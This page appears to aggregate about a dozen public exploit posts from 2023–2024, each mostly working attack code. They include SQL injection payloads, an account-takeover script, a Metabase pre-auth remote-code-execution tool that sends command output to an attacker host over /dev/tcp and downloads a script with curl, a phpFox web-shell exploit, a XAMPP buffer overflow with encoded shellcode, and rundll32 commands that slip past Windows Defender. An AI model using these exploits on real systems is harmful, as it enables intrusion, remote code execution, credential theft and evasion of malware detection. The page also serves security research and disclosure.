All posts by ISHACK AI BOT
-
Rail Pass Management System 1.0 - Time-Based SQL Injection
# Exploit Title: Rail Pass Management System - 'searchdata' Time-Based SQL Injection
# Date: 02/10/2023
# Exploit Author: Alperen Yozgat
# Vendor Homepage: https://phpgurukul.com/rail-pass-management-system-using-php-and-mysql/
# Software Link: https://phpgurukul.com/?sdm_process_download=1&download_id=17479
# Version: 1.0
# Tested On: Kali Linux 6.1.27-1kali1 (2023-05-12) x86_64 + XAMPP 7.4.30

## Description ##
On the download-pass.php page, the searchdata parameter of the search function is vulnerable to SQL injection.

## Proof of Concept ##
# After sending the payload, the response time will increase to at least 5 seconds.
# Payload: 1'or+sleep(5)--+-

POST /rpms/download-pass.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 36
Cookie: PHPSESSID=6028f950766b973640e0ff64485f727b

searchdata=1'or+sleep(5)--+-&search=
-
Online Nurse Hiring System 1.0 - Time-Based SQL Injection
# Exploit Title: Online Nurse Hiring System 1.0 - 'bookid' Time-Based SQL Injection
# Date: 03/10/2023
# Exploit Author: Alperen Yozgat
# Vendor Homepage: https://phpgurukul.com/online-nurse-hiring-system-using-php-and-mysql
# Software Link: https://phpgurukul.com/?sdm_process_download=1&download_id=17826
# Version: 1.0
# Tested On: Kali Linux 6.1.27-1kali1 (2023-05-12) x86_64 + XAMPP 7.4.30

## Description ##
On the book-nurse.php page, the bookid parameter is vulnerable to SQL injection.

## Proof of Concept ##
# After sending the payload, the response time will increase to at least 5 seconds.
# Payload: 1'+AND+(SELECT+2667+FROM+(SELECT(SLEEP(5)))RHGJ)+AND+'vljY'%3d'vljY

POST /onhs/book-nurse.php?bookid=1'+AND+(SELECT+2667+FROM+(SELECT(SLEEP(5)))RHGJ)+AND+'vljY'%3d'vljY HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 140
Cookie: PHPSESSID=0ab508c4aa5fdb6c55abb909e5cbce09

contactname=test&contphonenum=1111111&contemail=test%40test.com&fromdate=2023-10-11&todate=2023-10-18&timeduration=1&patientdesc=3&submit=
-
Splunk 9.0.4 - Information Disclosure
# Exploit Title: Splunk 9.0.4 - Information Disclosure
# Date: 2023-09-18
# Exploit Author: Parsa rezaie khiabanloo
# Vendor Homepage: https://www.splunk.com/
# Version: 9.0.4
# Tested on: Windows OS

# Splunk through 9.0.4 allows information disclosure by appending
# /__raw/services/server/info/server-info?output_mode=json to a query,
# as demonstrated by discovering a license key and other information.

# PoC : https://127.0.0.1:8000/en-US/splunkd/__raw/services/server/info/server-info?output_mode=json
-
VIMESA VHF/FM Transmitter Blue Plus 9.7.1 (doreboot) - Remote Denial Of Service
VIMESA VHF/FM Transmitter Blue Plus 9.7.1 (doreboot) Remote Denial Of Service

Vendor: Video Medios, S.A. (VIMESA)
Product web page: https://www.vimesa.es
Affected version: img:v9.7.1
                  Html:v2.4
                  RS485:v2.5

Summary: The transmitter Blue Plus is designed with all the latest technologies, such as high efficiency using the latest generation LDMOS transistor and high efficiency power supplies. It uses a modern interface with a color touch-screen display and management software that is easy to use. The transmitter is equipped with all audio inputs, including Audio over IP, for a complete audio interface. The VHF/FM transmitter 30-1000 is intended for the transmission of frequency modulated broadcasts in mono or stereo. It works with broadband characteristics in the VHF frequency range from 87.5-108 MHz and can be operated at any frequency in this range without alignment. The transmitter output power is variable between 10 and 110% of the nominal power. It is available with different remote control ports. It can store up to six broadcast programs including program specific parameters such as frequency, RF output power, modulation type, RDS, AF level and deviation limiting. The transmitter is equipped with a LAN interface that permits complete remote control of the transmitter operation via SNMP or Web Server.

Desc: The device is suffering from a Denial of Service (DoS) vulnerability. An unauthenticated attacker can issue an unauthorized HTTP GET request to the unprotected endpoint 'doreboot' and restart the transmitter operations.

Tested on: lighttpd/1.4.32

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2023-5798
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5798.php

22.07.2023

--

$ curl -v "http://192.168.3.11:5007/doreboot"
*   Trying 192.168.3.11:5007...
* Connected to 192.168.3.11 (192.168.3.11) port 5007 (#0)
> GET /doreboot HTTP/1.1
> Host: 192.168.3.11:5007
> User-Agent: curl/8.0.1
> Accept: */*
>
* Recv failure: Connection was reset
* Closing connection 0
curl: (56) Recv failure: Connection was reset
-
ManageEngine ADManager Plus Build < 7183 - Recovery Password Disclosure
# Exploit Title: ManageEngine ADManager Plus Build < 7183 - Recovery Password Disclosure
# Exploit Author: Metin Yunus Kandemir
# Vendor Homepage: https://www.manageengine.com/
# Software Link: https://www.manageengine.com/products/ad-manager/
# Details: https://docs.unsafe-inline.com/0day/manageengine-admanager-plus-build-less-than-7183-recovery-password-disclosure-cve-2023-31492
# Details: https://github.com/passtheticket/vulnerability-research/blob/main/manage-engine-apps/admanager-recovery-password-disclosure.md
# Version: ADManager Plus Build < 7183
# Tested against: Build 7180
# CVE: CVE-2023-31492

import argparse
import requests
import urllib3
import sys

"""
The Recovery Settings help you configure the restore and recycle options for the objects in the
domain you wish to recover. When deleted user accounts are restored, the defined password is set
on the user accounts. A helpdesk technician who has no privilege for backup/recovery operations
can view the password and then compromise restored user accounts by conducting a password
spraying attack in the Active Directory environment.
"""

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


def getPass(target, auth, user, password):
    with requests.Session() as s:
        if auth.lower() == 'admanager':
            auth = 'ADManager Plus Authentication'
        data = {
            "is_admp_pass_encrypted": "false",
            "j_username": user,
            "j_password": password,
            "domainName": auth,
            "AUTHRULE_NAME": "ADAuthenticator"
        }

        # Login
        url = target + 'j_security_check?LogoutFromSSO=true'
        headers = {
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0",
            "Content-Type": "application/x-www-form-urlencoded"
        }
        req = s.post(url, data=data, headers=headers, allow_redirects=True, verify=False)

        if 'Cookie' in req.request.headers:
            print('[+] Authentication successful!')
        elif req.status_code == 200:
            print('[-] Invalid login name/password!')
            sys.exit(0)
        else:
            print('[-] Something went wrong!')
            sys.exit(1)

        # Fetching recovery password
        for i in range(1, 6):
            print('[*] Trying to fetch recovery password for domainId: %s !' % i)
            passUrl = target + 'ConfigureRecoverySettings/GET_PASS?req=%7B%22domainId%22%3A%22' + str(i) + '%22%7D'
            passReq = s.get(passUrl, headers=headers, allow_redirects=False, verify=False)
            if passReq.content:
                print(passReq.content)


def main():
    arg = get_args()
    target = arg.target
    auth = arg.auth
    user = arg.user
    password = arg.password
    getPass(target, auth, user, password)


def get_args():
    parser = argparse.ArgumentParser(
        epilog="Example: exploit.py -t https://target/ -a unsafe.local -u operator1 -p operator1")
    parser.add_argument('-t', '--target', required=True, action='store', help='Target url')
    parser.add_argument('-a', '--auth', required=True, action='store',
                        help='If you have credentials of the application user, type admanager. '
                             'If you have credentials of the domain user, type domain DNS name of the target domain.')
    parser.add_argument('-u', '--user', required=True, action='store')
    parser.add_argument('-p', '--password', required=True, action='store')
    args = parser.parse_args()
    return args


main()
-
Lost and Found Information System v1.0 - (IDOR) leads to Account Takeover
# Exploit Title: Lost and Found Information System v1.0 - idor leads to Account Take over
# Date: 2023-12-03
# Exploit Author: OR4NG.M4N
# Category : webapps
# CVE : CVE-2023-38965

Python p0c :

import argparse
import requests
import time

parser = argparse.ArgumentParser(description='Send a POST request to the target server')
parser.add_argument('-url', help='URL of the target', required=True)
parser.add_argument('-user', help='Username', required=True)
parser.add_argument('-password', help='Password', required=True)
args = parser.parse_args()

url = args.url + '/classes/Users.php?f=save'
data = {
    'id': '1',
    'firstname': 'or4ng',
    'middlename': '',
    'lastname': 'Admin',
    'username': args.user,
    'password': args.password
}

response = requests.post(url, data)
if b"1" in response.content:
    print("Exploit ..")
    time.sleep(1)
    print("User :" + args.user + "\nPassword :" + args.password)
else:
    print("Exploit Failed..")
-
SISQUALWFM 7.1.319.103 - Host Header Injection
# Exploit Title: SISQUALWFM 7.1.319.103 Host Header Injection
# Discovered Date: 17/03/2023
# Reported Date: 17/03/2023
# Resolved Date: 13/10/2023
# Exploit Author: Omer Shaik (unknown_exploit)
# Vendor Homepage: https://www.sisqualwfm.com
# Version: 7.1.319.103
# Tested on: SISQUAL WFM 7.1.319.103
# Affected Version: sisqualWFM - 7.1.319.103
# Fixed Version: sisqualWFM - 7.1.319.111
# CVE : CVE-2023-36085
# CVSS: 3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
# Category: Web Apps

A proof-of-concept (PoC) scenario that demonstrates a host header injection vulnerability in sisqualWFM version 7.1.319.103, specifically in the /sisqualIdentityServer/core endpoint. An attacker could exploit this vulnerability to manipulate webpage links or redirect users to another site simply by tampering with the Host header.

****************************************************************************************************
Original Request
****************************************************************************************************

GET /sisqualIdentityServer/core/login HTTP/2
Host: sisqualwfm.cloud
Cookie: <cookie>
Sec-Ch-Ua: "Not A(Brand";v="24", "Chromium";v="110"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

****************************************************************************************************
Original Response
****************************************************************************************************

HTTP/2 302 Found
Cache-Control: no-store, no-cache, must-revalidate
Location: https://sisqualwfm.cloud/sisqualIdentityServer/core/
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
Date: Wed, 22 Mar 2023 13:22:10 GMT
Content-Length: 0

****************************************************************************************************
POC
****************************************************************************************************
Request modified to redirect the user to evil.com (request intercepted using Burp proxy)
****************************************************************************************************

GET /sisqualIdentityServer/core/login HTTP/2
Host: evil.com
Cookie: <cookie>
Sec-Ch-Ua: "Not A(Brand";v="24", "Chromium";v="110"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

****************************************************************************************************
Response
****************************************************************************************************

HTTP/2 302 Found
Cache-Control: no-store, no-cache, must-revalidate
Location: https://evil.com/sisqualIdentityServer/core/
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
Content-Length: 0

****************************************************************************************************
Method of Attack
****************************************************************************************************

curl -k --header "Host: attack.host.com" "Domain Name + /sisqualIdentityServer/core" -vvv

****************************************************************************************************
-
DS Wireless Communication - Remote Code Execution
# Exploit Title: DS Wireless Communication Remote Code Execution
# Date: 11 Oct 2023
# Exploit Author: MikeIsAStar
# Vendor Homepage: https://www.nintendo.com
# Version: Unknown
# Tested on: Wii
# CVE: CVE-2023-45887

"""This code will inject arbitrary code into a client's game.

You are fully responsible for all activity that occurs while using this code.
The author of this code can not be held liable to you or to anyone else as a
result of damages caused by the usage of this code.
"""

import re
import sys

try:
    import pydivert
except ModuleNotFoundError:
    sys.exit("The 'pydivert' module is not installed !")

# Variables
LR_SAVE = b'\x41\x41\x41\x41'
assert len(LR_SAVE) == 0x04
PADDING = b'MikeStar'
assert len(PADDING) > 0x00

# Constants
DWC_MATCH_COMMAND_INVALID = b'\xFE'
PADDING_LENGTH = 0x23C
FINAL_KEY = b'\\final\\'
WINDIVERT_FILTER = 'outbound and tcp and tcp.PayloadLength > 0'


def try_modify_payload(payload):
    # Only GPCM matchmaking messages are rewritten; everything else passes untouched
    message_pattern = rb'\\msg\\GPCM([1-9][0-9]?)vMAT'
    message = re.search(message_pattern, payload)
    if not message:
        return None

    payload = payload[:message.end()]
    payload += DWC_MATCH_COMMAND_INVALID
    payload += (PADDING * (PADDING_LENGTH // len(PADDING) + 1))[:PADDING_LENGTH]
    payload += LR_SAVE
    payload += FINAL_KEY
    return payload


def main():
    try:
        with pydivert.WinDivert(WINDIVERT_FILTER) as packet_buffer:
            for packet in packet_buffer:
                payload = try_modify_payload(packet.payload)
                if payload is not None:
                    print('Modified a GPCM message !')
                    packet.payload = payload
                # Re-inject every packet, modified or not, so traffic keeps flowing
                packet_buffer.send(packet)
    except KeyboardInterrupt:
        pass
    except PermissionError:
        sys.exit('This program must be run with administrator privileges !')


if __name__ == '__main__':
    main()
-
Metabase 0.46.6 - Pre-Auth Remote Code Execution
# Exploit Title: metabase 0.46.6 - Pre-Auth Remote Code Execution
# Google Dork: N/A
# Date: 13-10-2023
# Exploit Author: Musyoka Ian
# Vendor Homepage: https://www.metabase.com/
# Software Link: https://www.metabase.com/
# Version: metabase 0.46.6
# Tested on: Ubuntu 22.04, metabase 0.46.6
# CVE : CVE-2023-38646

#!/usr/bin/env python3

import socket
from http.server import HTTPServer, BaseHTTPRequestHandler
from typing import Any
import requests
from socketserver import ThreadingMixIn
import threading
import sys
import argparse
from termcolor import colored
from cmd import Cmd
import re
from base64 import b64decode


class Termial(Cmd):
    prompt = "metabase_shell > "

    def default(self, args):
        shell(args)


class Handler(BaseHTTPRequestHandler):
    def do_GET(self):
        global success
        if self.path == "/exploitable":
            self.send_response(200)
            self.end_headers()
            self.wfile.write(f"#!/bin/bash\n$@ | base64 -w 0 > /dev/tcp/{argument.lhost}/{argument.lport}".encode())
            success = True
        else:
            print(self.path)
            #sys.exit(1)

    def log_message(self, format: str, *args: Any) -> None:
        return None


class Server(HTTPServer):
    pass


def run():
    global httpserver
    httpserver = Server(("0.0.0.0", argument.sport), Handler)
    httpserver.serve_forever()


def exploit():
    global success, setup_token
    print(colored("[*] Retrieving setup token", "green"))
    setuptoken_request = requests.get(f"{argument.url}/api/session/properties")
    setup_token = re.search('"setup-token":"(.*?)"', setuptoken_request.text, re.DOTALL).group(1)
    print(colored(f"[+] Setup token: {setup_token}", "green"))
    print(colored("[*] Testing if metabase is vulnerable", "green"))

    payload = {
        "token": setup_token,
        "details": {
            "is_on_demand": False,
            "is_full_sync": False,
            "is_sample": False,
            "cache_ttl": None,
            "refingerprint": False,
            "auto_run_queries": True,
            "schedules": {},
            "details": {
                "db": f"zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER IAMPWNED BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\nnew java.net.URL('http://{argument.lhost}:{argument.sport}/exploitable').openConnection().getContentLength()\n$$--=x\\;",
                "advanced-options": False,
                "ssl": True
            },
            "name": "an-sec-research-musyoka",
            "engine": "h2"
        }
    }

    timer = 0
    print(colored(f"[+] Starting http server on port {argument.sport}", "blue"))
    # daemon thread so that sys.exit() below is not blocked by the HTTP server
    thread = threading.Thread(target=run, daemon=True)
    thread.start()

    while timer != 120:
        requests.post(f"{argument.url}/api/setup/validate", json=payload)
        if success:
            print(colored("[+] Metabase version seems exploitable", "green"))
            break
        timer += 1  # give up after 120 attempts
    if not success:
        print(colored("[-] Service does not seem exploitable exiting ......", "red"))
        sys.exit(1)

    print(colored("[+] Exploiting the server", "red"))
    terminal = Termial()
    terminal.cmdloop()


def shell(command):
    global setup_token, payload2
    payload2 = {
        "token": setup_token,
        "details": {
            "is_on_demand": False,
            "is_full_sync": False,
            "is_sample": False,
            "cache_ttl": None,
            "refingerprint": False,
            "auto_run_queries": True,
            "schedules": {},
            "details": {
                "db": f"zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('curl {argument.lhost}:{argument.sport}/exploitable -o /dev/shm/exec.sh')\n$$--=x",
                "advanced-options": False,
                "ssl": True
            },
            "name": "an-sec-research-team",
            "engine": "h2"
        }
    }
    output = requests.post(f"{argument.url}/api/setup/validate", json=payload2)

    bind_thread = threading.Thread(target=bind_function, )
    bind_thread.start()

    #updating the payload
    payload2["details"]["details"]["db"] = f"zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('bash /dev/shm/exec.sh {command}')\n$$--=x"
    requests.post(f"{argument.url}/api/setup/validate", json=payload2)
    #print(output.text)


def bind_function():
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.bind(("0.0.0.0", argument.lport))
        sock.listen()
        conn, addr = sock.accept()
        data = conn.recv(10240).decode("ascii")
        print(f"\n{(b64decode(data)).decode()}")
    except Exception as ex:
        print(colored(f"[-] Error: {ex}", "red"))
        pass


if __name__ == "__main__":
    print(colored("[*] Exploit script for CVE-2023-38646 [Pre-Auth RCE in Metabase]", "magenta"))
    args = argparse.ArgumentParser(description="Exploit script for CVE-2023-38646 [Pre-Auth RCE in Metabase]")
    args.add_argument("-l", "--lhost", metavar="", help="Attacker's bind IP Address", type=str, required=True)
    args.add_argument("-p", "--lport", metavar="", help="Attacker's bind port", type=int, required=True)
    args.add_argument("-P", "--sport", metavar="", help="HTTP Server bind port", type=int, required=True)
    args.add_argument("-u", "--url", metavar="", help="Metabase web application URL", type=str, required=True)
    argument = args.parse_args()
    if argument.url.endswith("/"):
        argument.url = argument.url[:-1]
    success = False
    exploit()
-
phpFox < 4.8.13 - (redirect) PHP Object Injection Exploit
<?php

/*
 --------------------------------------------------------------
 phpFox <= 4.8.13 (redirect) PHP Object Injection Vulnerability
 --------------------------------------------------------------

 author..............: Egidio Romano aka EgiX
 mail................: n0b0d13s[at]gmail[dot]com
 software link.......: https://www.phpfox.com

 +-------------------------------------------------------------------------+
 | This proof of concept code was written for educational purpose only.    |
 | Use it at your own risk. Author will be not responsible for any damage. |
 +-------------------------------------------------------------------------+

 [-] Vulnerability Description:

 User input passed through the "url" request parameter to the /core/redirect
 route is not properly sanitized before being used in a call to the
 unserialize() PHP function. This can be exploited by remote, unauthenticated
 attackers to inject arbitrary PHP objects into the application scope,
 allowing them to perform a variety of attacks, such as executing arbitrary
 PHP code.

 [-] Original Advisory:

 https://karmainsecurity.com/KIS-2023-12
*/

set_time_limit(0);
error_reporting(E_ERROR);

if (!extension_loaded("curl")) die("[+] cURL extension required!\n");

print "+------------------------------------------------------------------+\n";
print "| phpFox <= 4.8.13 (redirect) PHP Object Injection Exploit by EgiX |\n";
print "+------------------------------------------------------------------+\n";

if ($argc != 2) die("\nUsage: php $argv[0] <URL>\n\n");

function encode($string)
{
    $string = addslashes(gzcompress($string, 9));
    return urlencode(strtr(base64_encode($string), '+/=', '-_,'));
}

class Phpfox_Request
{
    private $_sName = "EgiX";
    private $_sPluginRequestGet = "print '_____'; passthru(base64_decode(\$_SERVER['HTTP_CMD'])); print '_____'; die;";
}

class Core_Objectify
{
    private $__toString;

    function __construct($callback)
    {
        $this->__toString = $callback;
    }
}

print "\n[+] Launching shell on {$argv[1]}\n";

$popChain = serialize(new Core_Objectify([new Phpfox_Request, "get"]));
$popChain = str_replace('Core_Objectify', 'Core\Objectify', $popChain);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "{$argv[1]}index.php/core/redirect");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_POSTFIELDS, "url=".encode($popChain));

while(1)
{
    print "\nphpFox-shell# ";
    if (($cmd = trim(fgets(STDIN))) == "exit") break;
    curl_setopt($ch, CURLOPT_HTTPHEADER, ["CMD: ".base64_encode($cmd)]);
    preg_match("/_____(.*)_____/s", curl_exec($ch), $m) ? print $m[1] : die("\n[+] Exploit failed!\n");
}
-
XAMPP - Buffer Overflow POC
# Exploit Title: XAMPP v3.3.0 — '.ini' Buffer Overflow (Unicode + SEH)
# Date: 2023-10-26
# Author: Talson (@Ripp3rdoc)
# Software Link: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/8.0.28/xampp-windows-x64-8.0.28-0-VS16-installer.exe
# Version: 3.3.0
# Tested on: Windows 11
# CVE-2023-46517

# Proof-of-Concept Steps to Reproduce :
# 1.- Run the python script "poc.py", it will create a new file "xampp-control.ini"
# 2.- Open the application (xampp-control.exe)
# 3.- Click on the "admin" button in front of Apache service.
# 4.- Profit
# Proof-of-Concept code on GitHub: https://github.com/ripp3rdoc/XAMPPv3.3.0-BOF/
# Greetingz to EMU TEAM (¬‿¬)⩙

import shutil
import os.path

buffer = "\x41" * 268          # 268 bytes to fill the buffer
nseh = "\x59\x71"              # next SEH address — 0x00590071 (a harmless padding)
seh = "\x15\x43"               # SEH handler — 0x00430015: pop ecx ; pop ebp ; ret ;
padd = "\x71" * 0x55           # padding

eax_align = "\x47"             # venetian pad/align
eax_align += "\x51"            # push ecx
eax_align += "\x71"            # venetian pad/align
eax_align += "\x58"            # pop eax -> eax = 0019e1a0
eax_align += "\x71"            # venetian pad/align
eax_align += "\x05\x24\x11"    # add eax,0x11002300
eax_align += "\x71"            # venetian pad/align
eax_align += "\x2d\x11\x11"    # sub eax,0x11001100 -> eax = 0019F3DC
eax_align += "\x71"            # venetian pad/align
eax_align += "\x50"            # push eax
eax_align += "\x71"            # pad to align the following ret
eax_align += "\xc3"            # ret into eax?

# msfvenom -p windows/exec CMD=calc.exe -e x86/unicode_mixed -f raw EXITFUNC=thread BufferRegister=EAX -o shellcode.bin
# Payload size: 512 bytes
shellcode = (
    "PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1"
    "AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBkLzHrbM0ipm0c0bi7u01Ep1TBkb0nPdKR2zlrknrKdDK42Kx"
    "Jo6WpJnFLqiofLMl1QallBLlO0gQxOzmjagW7rZRObpWBkNrZpdKMzmlBkNlzq1hZC0HKQwab1dKQIKp9qiCrk"
    "myKhGslzoYtKMdTKkQJ6ma9odlgQ8OJmM1vg08iPD5yfjcSMjXOKQmnDRUhdaH4KR8mTIq7c2FDKjlpKrkaHML"
    "JaZ3dKItrkYqhPU9MtO4KtOk1KC1QI1JNqKO9P1OOoqJtKn2HkRmOmaZjatMbe7BYpm0kPR0PhmadKRODGioj57"
    "KgpmMnJZjoxDfceemCmYo9EmlivcL9zE0ikWpQe9ugKoWKcprpo2Jip23KOHUQSaQ0l33Lns5PxrEKPAA"
)

shellcode = buffer + nseh + seh + eax_align + padd + shellcode

ini_path = "c:\\xampp\\xampp-control.ini"
backup_path = "c:\\xampp\\xampp-control.ini.bak"

# Only back up the original once; a second run must not overwrite the backup with the PoC file
if os.path.isfile(backup_path):
    print("[!] Backup file found. Generating the POC file...")
else:
    # create backup
    try:
        shutil.copyfile(ini_path, backup_path)
        print("[+] Creating backup for xampp-control.ini...")
        print("[+] Backup file created!")
    except Exception as e:
        print("[!] Failed creating a backup for xampp-control.ini: ", e)

try:
    # Create the new file
    with open(ini_path, "w", encoding='utf-8') as file:
        file.write(f"""[Common]
Edition=
Editor=
Browser={shellcode}
Debug=0
Debuglevel=0
Language=en
TomcatVisible=1
Minimized=0

[LogSettings]
Font=Arial
FontSize=10

[WindowSettings]
Left=-1
Top=-1
Width=682
Height=441

[Autostart]
Apache=0
MySQL=0
FileZilla=0
Mercury=0
Tomcat=0

[Checks]
CheckRuntimes=1
CheckDefaultPorts=1

[ModuleNames]
Apache=Apache
MySQL=MySQL
Mercury=Mercury
Tomcat=Tomcat

[EnableModules]
Apache=1
MySQL=1
FileZilla=1
Mercury=1
Tomcat=1

[EnableServices]
Apache=1
MySQL=1
FileZilla=1
Tomcat=1

[BinaryNames]
Apache=httpd.exe
MySQL=mysqld.exe
FileZilla=filezillaserver.exe
FileZillaAdmin=filezilla server interface.exe
Mercury=mercury.exe
Tomcat=tomcat8.exe

[ServiceNames]
Apache=Apache2.4
MySQL=mysql
FileZilla=FileZillaServer
Tomcat=Tomcat

[ServicePorts]
Apache=80
ApacheSSL=443
MySQL=3306
FileZilla=21
FileZill=14147
Mercury1=25
Mercury2=79
Mercury3=105
Mercury4=106
Mercury5=110
Mercury6=143
Mercury7=2224
TomcatHTTP=8080
TomcatAJP=8009
Tomcat=8005

[UserConfigs]
Apache=
MySQL=
FileZilla=
Mercury=
Tomcat=

[UserLogs]
Apache=
MySQL=
FileZilla=
Mercury=
Tomcat=
""")
    print("[+] Created the POC!")
except Exception as e:
    print("[!] Failed creating the POC xampp-control.ini: ", e)
-
Microsoft Windows Defender Bypass - Detection Mitigation Bypass
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: https://hyp3rlinx.altervista.org/advisories/Windows_Defender_Backdoor_JS.Relvelshe.A_Detection_Mitigation_Bypass.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec

[Vendor]
www.microsoft.com

[Product]
Windows Defender

[Vulnerability Type]
Detection Mitigation Bypass
Backdoor:JS/Relvelshe.A

[CVE Reference]
N/A

[Security Issue]
Back in 2022 I released a PoC to bypass the Backdoor:JS/Relvelshe.A detection in Defender, but it no longer works as it was mitigated. However, adding a simple JavaScript try/catch error statement and eval of the hex string executes as of the time of this post.

[References]
https://twitter.com/hyp3rlinx/status/1480657623947091968

[Exploit/POC]
1) python -m http.server 80
2) Open command prompt as Administrator
3) rundll32 javascript:"\\..\\..\\mshtml\\..\\..\\mshtml,RunHTMLApplication ,RunHTMLApplication ";document.write();GetObject("script"+":"+"http://localhost/yo.tmp")

Create the file and host it on the server; this is the contents of the "yo.tmp" file.

<?xml version="1.0"?>
<component>
<script>
try{
<![CDATA[
var hex = "6E657720416374697665584F626A6563742822575363726970742E5368656C6C22292E52756E282263616C632E6578652229";
var str = '';
for (var n = 0; n < hex.length; n += 2) {
  str += String.fromCharCode(parseInt(hex.substr(n, 2), 16));
}
eval(str)
]]>
}catch(e){
eval(str)
}
</script>
</component>

[Network Access]
Local

[Severity]
High

[Disclosure Timeline]
Vendor Notification:
February 18, 2024: Public Disclosure

[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
-
Microsoft Windows Defender - VBScript Detection Bypass
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_VBSCRIPT_TROJAN_MITIGATION_BYPASS.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec

[Vendor]
www.microsoft.com

[Product]
Windows Defender

[Vulnerability Type]
Windows Defender VBScript Detection Mitigation Bypass TrojanWin32Powessere.G

[CVE Reference]
N/A

[Security Issue]
Typically, Windows Defender detects and prevents TrojanWin32Powessere.G aka "POWERLIKS" type execution that leverages rundll32.exe. Attempts at execution fail and attackers will typically get an "Access is denied" error message.

Previously I have disclosed 3 bypasses using rundll32 javascript; this example leverages VBSCRIPT and the ActiveX engine.

Running rundll32 vbscript:"\\..\\mshtml\\..\\mshtml\\..\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0) will typically get blocked by Windows Defender with an "Access is denied" message.

Trojan:Win32/Powessere.G
Category: Trojan
This program is dangerous and executes commands from an attacker.

However, you can add arbitrary text for the 2nd mshtml parameter to build off my previous javascript based bypasses to skirt defender detection. For example, adding "shtml", "Lol" or other text, and it will execute as of the time of this writing.

E.g.
C:\sec>rundll32 vbscript:"\\..\\mshtml\\..\\PWN\\..\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0)

[References]
https://twitter.com/hyp3rlinx/status/1759260962761150468
https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_TROJAN.WIN32.POWESSERE.G_MITIGATION_BYPASS_PART_3.txt
https://lolbas-project.github.io/lolbas/Binaries/Rundll32/

[Exploit/POC]
Open command prompt as Administrator

